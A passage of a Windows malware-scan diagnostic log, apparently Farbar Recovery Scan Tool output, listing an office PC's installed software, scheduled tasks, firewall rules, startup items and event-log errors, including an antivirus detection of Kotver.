HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.12992 - HP)
HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP)
HP Smart Web Printing 4.60 (HKLM\...\HP Smart Web Printing) (Version: 4.60 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
HPProductAssistant (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iCloud (HKLM\...\{724A887F-2B55-4306-B6F9-8F0E7A04B1B5}) (Version: 5.2.2.87 - Apple Inc.)
Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2869 - Intel Corporation)
iTunes (HKLM\...\{955524E7-79EB-4CA9-BA4D-FD2DF587651B}) (Version: 12.4.3.1 - Apple Inc.)
join.me (HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\JoinMe) (Version: 1.9.1.204 - LogMeIn, Inc.)
Logitech Unifying Software 1.00 (HKLM\...\Logitech Unifying) (Version: 1.00.127 - Logitech)
LogMeIn (HKLM-x32\...\{F099EA75-A298-4A13-93CB-D2446436B137}) (Version: 4.1.3888 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
MarketResearch (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft IntelliType Pro 8.2 (HKLM\...\Microsoft IntelliType Pro 8.2) (Version: 8.20.469.0 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MS Word Employment Application Template Software (HKLM-x32\...\MS Word Employment Application Template Software_is1) (Version: - Sobolsoft)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden
Network64 (Version: 140.0.221.000 - Hewlett-Packard) Hidden
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (HKLM-x32\...\Pervasive PSQL v10 SP3 Workgroup (32-bit)) (Version: 10.30.024 - Pervasive Software)
Pervasive PSQL v10 SP3 Workgroup (32-bit) (x32 Version: 10.30.024 - Pervasive Software) Hidden
Print Tracker (HKLM-x32\...\Print Tracker_is1) (Version: - Really Impressive Products, LLC)
Product Improvement Study for HP Deskjet 2540 series (HKLM\...\{2302D958-4F1E-469A-8A90-15C321320C71}) (Version: 30.0.1093.41190 - Hewlett-Packard Co.)
Product Improvement Study for HP Officejet Pro 8610 (HKLM\...\{D2064264-3162-4DB1-AFE0-167BEFBBCD9C}) (Version: 32.3.198.49673 - Hewlett-Packard Co.)
ProductContext (x32 Version: 140.0.000.000 - Hewlett-Packard) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5841 - Realtek Semiconductor Corp.)
Roadkil's CommTest Version 1.3 (HKLM-x32\...\{DB6A986B-CCF7-4041-81ED-80EB2C106CC5}_is1) (Version: - Roadkil.Net)
Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
SmartWebPrinting (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
Smilebox (HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Smilebox) (Version: - )
SolutionCenter (x32 Version: 140.0.214.000 - Hewlett-Packard) Hidden
Status (x32 Version: 140.0.256.000 - Hewlett-Packard) Hidden
Symantec Endpoint Protection (HKLM\...\{827E3EA6-85D1-4413-96D8-24B0F9B49967}) (Version: 12.1.4112.4156 - Symantec Corporation)
The Print Shop 2.0 Professional (HKLM-x32\...\{159E3ACF-7D79-49A1-A085-9F53B0738C65}) (Version: 2.00.0000 - Encore)
The Print Shop 3.0 Deluxe (HKLM-x32\...\{A5154F2B-09F9-40A3-8CA5-B581CA9766C5}) (Version: 1.00.0000 - Encore Software, Inc.)
The Print Shop 3.0 Fonts (HKLM-x32\...\{2C3060F6-F0DC-4F63-A70F-2070BE57EEDC}) (Version: 1.0 - Encore)
The Print Shop 3.5 Fonts (HKLM-x32\...\{B6D7C4E3-27FB-4937-B1F3-9B26C5D2A65A}) (Version: 1.0 - Encore)
The Print Shop 3.5 Professional (HKLM-x32\...\{54BBB71F-59C7-4F1B-B08A-7908D4ED3A2B}) (Version: 1.00.0000 - Encore)
Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.213.000 - Hewlett-Packard) Hidden
Trend Micro Worry-Free Business Security Agent (x32 Version: 1.0.0 - Trend Micro Incorporated) Hidden
WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation)
WordPerfect Office X3 (HKLM-x32\...\_{83FBD495-DDF6-4C8D-92D6-10261DD6F6A3}) (Version: - Corel Corporation)
WordPerfect Office X3 (x32 Version: 13.3 - Corel Corporation) Hidden
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.70.25 - Zemana Ltd.)

==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Reception\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File

==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {245CD879-2842-422F-867B-DA8E3DF4B8EA} - System32\Tasks\HPCustParticipation HP Officejet Pro 8610 => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPCustPartic.exe [2014-07-21] (Hewlett-Packard Development Company, LP)
Task: {382A1033-1434-4011-8A0A-528FE84E942A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.)
Task: {6AFD2FFF-BB51-4CE5-998A-D02855A23969} - System32\Tasks\{3F506071-F11E-4C0B-96B7-E75E0CE71562} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] ()
Task: {6F7B3DA7-5C81-42D1-AAD4-E18FCF6E683E} - System32\Tasks\{C8E68830-7E17-4851-AABF-7A4BDB33E408} => pcalua.exe -a "C:\Program Files (x86)\The Weather Channel\The Weather Channel App\TheWeatherChannelCustomUninstall.exe"
Task: {76F492E8-4B04-431F-98ED-1B67F05F6858} - System32\Tasks\HPCustParticipation HP Deskjet 2540 series => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPCustPartic.exe [2013-02-08] (Hewlett-Packard Co.)
Task: {A177D0B5-D3BF-403E-8DA1-24A0048C0F82} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {ABE9B009-3F74-4365-BCFA-1E18A1FD5C02} - System32\Tasks\Microsoft_Hardware_Launch_IType_exe => c:\Program Files\Microsoft IntelliType Pro\IType.exe [2011-08-10] (Microsoft Corporation)
Task: {BC872F32-F800-4657-A412-6BFD3D112486} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-11-09] (Google Inc.)
Task: {C91051DC-C003-41F3-A158-EFD4AC8C6F0D} - System32\Tasks\HP Photo Creations Communicator => C:\ProgramData\HP Photo Creations\Communicator.exe [2014-09-15] ()
Task: {CD181832-44D0-4403-A423-C9A093D3E763} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-08] (Adobe Systems Incorporated)
Task: {CF5A98A5-FD07-4166-90D3-F61641768CC1} - System32\Tasks\{6D13831B-383D-46E9-9BCC-BB932C054E2C} => C:\Program Files (x86)\The Print Shop 2.0 Professional\PsLaunch.exe [2010-08-02] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HP Photo Creations Communicator.job => C:\ProgramData\HP Photo Creations\Communicator.exe

==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Reception\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4242a155fcc27c2b\FlashPeak Slimjet.lnk -> C:\Program Files (x86)\Slimjet\slimjet.exe (FlashPeak Inc.) -> --profile-directory=Default

==================== Loaded Modules (Whitelisted) ==============

2016-07-05 14:23 - 2016-07-05 14:23 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-07-05 14:23 - 2016-07-05 14:23 - 01354040 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-11-14 07:53 - 2016-11-14 07:53 - 00356008 _____ () C:\Program Files (x86)\Backblaze\bzserv.exe
2006-11-02 19:40 - 2006-11-02 19:40 - 00174656 _____ () C:\Windows\SysWOW64\PSIService.exe
2016-12-07 05:16 - 2016-12-07 05:16 - 00152944 _____ () C:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll
2009-07-13 16:03 - 2009-07-13 20:15 - 00364544 _____ () C:\Windows\SysWOW64\msjetoledb40.dll

==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SmcService => ""="Service"

==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2016-12-07 05:37 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Other Areas ============================
(Currently there is no automatic fix for this section.)

HKU\s-1-5-21-1158510682-2263174364-945799988-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\thepclink\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Control Panel\Desktop\\Wallpaper -> C:\Users\clayton\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\Control Panel\Desktop\\Wallpaper -> C:\Users\dcreery\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\Control Panel\Desktop\\Wallpaper -> C:\Users\blagler\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\Wallpaper -> C:\Users\Reception\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.105 - 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start Pervasive PSQL Workgroup Engine.lnk => C:\Windows\pss\Start Pervasive PSQL Workgroup Engine.lnk.CommonStartup
MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: FromDocToPDF EPM Support => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65medint.exe" T8EPMSUP.DLL,S
MSCONFIG\startupreg: HotKeysCmds => C:\Windows\system32\hkcmd.exe
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: IgfxTray => C:\Windows\system32\igfxtray.exe
MSCONFIG\startupreg: itype => "c:\Program Files\Microsoft IntelliType Pro\itype.exe"
MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
MSCONFIG\startupreg: Persistence => C:\Windows\system32\igfxpers.exe
MSCONFIG\startupreg: Print Monitor => "C:\Program Files (x86)\Print Tracker\PMonitor.exe" /AsUser
MSCONFIG\startupreg: QuickFinder Scheduler => "C:\Program Files (x86)\WordPerfect Office X3\Programs\QFSCHD130.EXE"
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
MSCONFIG\startupreg: Skytel => C:\Program Files\Realtek\Audio\HDA\Skytel.exe

==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => %SystemRoot%\system32\sppsvc.exe
FirewallRules: [TCP Query User{82CC6A84-0F65-47EA-8BE3-F207CA244A2C}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{F8BCDB72-BF90-4CE2-9BF9-1F4B8BB7D292}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{56BBE8D5-557C-483C-A36E-4694A337C99F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{A4AC4264-384E-41D6-AE48-36C847FD9539}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{3127FC7D-4D1B-455D-B7FD-41CABFC6B21C}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{FCEEA91D-AE9E-479A-BE17-030E83DE8281}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{4063CEB6-2A45-4A28-AFF2-292C9B3E6DCF}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{2570D9B0-C167-4D49-A8CA-DB43E258CA88}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe
FirewallRules: [{BF1156BA-9B51-48C7-B6E0-A68BCFD0641A}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe
FirewallRules: [{AB1BA386-08EA-4CB3-9290-169EF3FC7956}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{FC73E6D9-AF81-4BA0-A837-67869A303783}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe
FirewallRules: [{86410668-EC09-4E8F-AA57-37BE1A7B9E56}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{CF6F3B7A-5FFE-4857-A35C-5056D09FEB34}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe
FirewallRules: [{4C8EF354-5132-43C1-98AA-D5A2B10A5B9F}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe
FirewallRules: [{2C19E4F3-E543-4376-ABB5-70AA0A2A3178}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{BA01ACB9-72F5-4449-BE99-062BA48EC933}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{E96100CC-BA53-41AA-8CAE-4E9E87F8E1B0}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{8BE0A430-C8F8-4B3F-BBAF-4B30FA8F4FC7}] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{50745699-4E20-4E3C-832B-1E6A05ED30E7}] => C:\Program Files (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{A1CEF5E6-3D62-42F7-B10F-3EE826F69F35}] => C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exe
FirewallRules: [{CFE82968-778D-404A-8383-E4B132C83C1C}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe
FirewallRules: [{FE5A9F0F-64E5-43A5-B74D-4267BA445714}] => C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe
FirewallRules: [{792D535E-6928-4608-AB87-7EAC62FCFAD9}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetup.exe
FirewallRules: [{DF705928-FDE8-4C27-93B5-159AA18EE903}] => LPort=5357
FirewallRules: [{8036A550-984E-4D16-A1BA-56A200E03D1A}] => C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{EC49BD0F-52D9-4B49-9730-1B4F69FE6296}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe
FirewallRules: [UDP Query User{91FAA043-EAF2-48B8-A853-F19E71692E51}C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe] => C:\program files (x86)\pervasive software\psql\bin\w3dbsmgr.exe
FirewallRules: [{5010814D-4D26-4D7F-8B80-2D90CF068D4D}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{E54FEB7B-9565-41DA-85DC-E1FD68D6247E}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
FirewallRules: [{B9D0A4E9-E6F9-4146-8B03-67C75D8B4F51}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
FirewallRules: [{7F3D2F9D-D014-4F5A-8CBA-3FBD39FD23D8}] => C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe
FirewallRules: [{44ECC4F7-DA04-49D9-854A-01A39B01C141}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{DA3C61ED-20F4-4287-B397-8CA879900055}] => C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{077B6AE8-63F5-4122-A822-4D12160FAA23}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FC758905-E8A3-431E-A498-DD8694753456}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{22F46C83-35C6-4AA0-B038-180F477DCBFE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\FaxApplications.exe
FirewallRules: [{11096C12-C565-4CE1-B681-C4F76663EF49}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\DigitalWizards.exe
FirewallRules: [{5204B832-817F-4173-9CE2-0D69EBBDC6AE}] => C:\Program Files\HP\HP Officejet Pro 8610\bin\SendAFax.exe
FirewallRules: [{44E5427D-1340-4119-B492-CBED58B9C1F1}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\DeviceSetup.exe
FirewallRules: [{129E950C-8BB0-420D-85EA-7208EF2C3D43}] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{D5D458D6-78D8-41E9-B965-9ACCD3323D44}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{396FFEC3-E353-4DCE-9F52-20C78D68CE90}] => C:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{52AF0EF5-B842-4C97-BB7E-5B8DC02D3EA3}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe
FirewallRules: [UDP Query User{6D52537C-A62A-4A8D-AAF5-02DCDC7B910C}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe
FirewallRules: [{A4391F3D-FD04-44C9-9AD0-384F184595D4}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-11-2016 15:49:23 Installed LogMeIn
08-11-2016 16:07:12 Installed LogMeIn
09-11-2016 16:53:11 Windows Update
02-12-2016 04:48:22 Scheduled Checkpoint
05-12-2016 12:04:32 Restore Operation

==================== Faulty Device Manager Devices =============

Name: Photosmart Plus B210 series
Description: Photosmart Plus B210 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Photosmart 7510 series
Description: Photosmart 7510 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Officejet Pro 8610
Description: HP Officejet Pro 8610
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Officejet Pro 8610
Description: HP Officejet Pro 8610
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (12/06/2016 04:46:41 PM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS)
Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: .
Action Description: Access Denied Error: (12/06/2016 04:43:38 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479 Faulting module name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479 Exception code: 0xc0000005 Fault offset: 0x0019226f Faulting process id: 0xa3c Faulting application start time: 0x01d25008cc7a700a Faulting application path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE Faulting module path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE Report Id: 0b9bdde8-bbfd-11e6-8bb4-00270e34bb77 Error: (12/06/2016 04:35:06 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (12/06/2016 04:30:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Explorer.exe version 6.1.7601.23537 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 19f0 Start Time: 01d24fb2095acdfb Termination Time: 60000 Application Path: C:\Windows\Explorer.exe Report Id: 19b15be4-bbfb-11e6-8bb5-00270e34bb77 Error: (12/06/2016 04:26:59 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program EXCEL.EXE version 14.0.7176.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. 
